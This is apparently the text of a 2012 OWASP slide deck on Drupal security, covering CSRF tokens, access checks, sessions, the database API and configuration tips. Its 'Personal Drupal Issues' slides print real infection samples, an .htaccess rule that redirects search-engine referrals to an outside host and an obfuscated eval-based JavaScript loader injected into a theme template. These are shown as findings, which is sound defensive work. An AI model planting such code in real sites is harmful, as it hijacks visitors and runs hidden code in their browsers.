A Brief Analysis of Drupal Security

A Brief Analysis of Drupal Security

Andrew Welsh

21 Feb 2012

Presentation Overview

Introduction What is Drupal Secure Drupal Code Drupal Configuration Personal Drupal Issues Conclusion

Introduction

whoami;

Andrew.welsh@owasp.org

What is Drupal

Drupal is a mature, open-source, PHP-based CMS and web application framework. The Drupal project is composed of two principal bodies of work:

(1) the Drupal core code base

(2) thousands of contributed modules and themes

What is Drupal

Sites that use Drupal: Nasa The Economist Ubuntu 20th Century Fox Searchlight Warner Bros Recordings United Nations – End Poverty 2015 Yahoo! Research Amnesty International OpenOffice Extensions Popular Science AOL Corporate Nike Beijing Olympics White House

Secure Drupal Code

Form API:

<img src="http://test.com/index.php?delete=12" />

1) It requires the form to be loaded (given a token) before form submission can happen, making CSRF more difficult.

1) It validates and sanitizes data from form submissions, making XSS more difficult.

Secure Drupal Code

ACL- URL access

Http://www.site.com/user/1/delete

1) Menu system handles permission checking user_access('administer nodes', $account) node_access('edit', $node, $account)

- drupal_goto() instances are used to validate their compliance with internal redirects

Secure Drupal Code

Authentication

1) User sessions are destroyed and recreated upon logging out and logging in.2) Session IDs changed when permissions change.3) Auth cookies are not modifiable by site users.4) Passwords are salted and hashed.

Secure Drupal Code

Database API - to enforce security checks and good coding standards.

Bind Parameters Named Placeholders

Drupal Configuration

1) Configure logging appropriately, never display log errors to users.2) Never display db connection strings.3) Check watchdog report.4) Look at all administrator permissions.5) Watch input formats for comments, etc.

Drupal Configuration (v5)

Drupal Configuration

Update Regularly!

Personal Drupal Issues

Public node access

Personal Drupal Issues

#336988#<IfModule mod_rewrite.c>RewriteEngine OnRewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|

allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio......sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

RewriteRule ^(.*)$ http://forumbeagle.cba.pl/store/traf.php [R=301,L]</IfModule>#/336988#

Personal Drupal Issues

JS injection in page.tpl.php

<script type=\"text/javascript\" language=\"javascript\" > try{window.document.body++}catch(gdsgsdg){dbshre=179;} if(dbshre){ asd=0;

try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;

asgq=newArray(31,94,110,104,94,107.........101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,93,113,99,93,100,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,93,113,99,93,100,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s=\"\";for(i=0;i-500!=0;i++){

if((020==0x10)&&window.document )s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4)); }

z=s;e(s)

} </script>

Conclusion

Personal Thoughts: Drupal is a very good, well-used, peer-reviewed

CMS and the security aspect is well addressed. Always stay current with upgrades. Be careful with custom code (themes or

modules), always peer review.

Thank You

Contact Info: Andrew.welsh@owasp.org

Sources: http://drupal.org/writing-secure-code

http://drupal.org/node/766404

http://drupal.org/security/secure-configuration

http://www.mediacurrent.com/blog/drupal-security-review

http://www.slideshare.net/fourkitchens/is-drupal-secure

http://drupalsecurityreport.org/sites/drupalsecurityreport.org/files/drupal-security-white-paper-1-1.pdf

http://drupal.org/documentation/is-drupal-secure

http://www.cameronandwilding.com/blog/pablo/10-most-critical-drupal-security-risks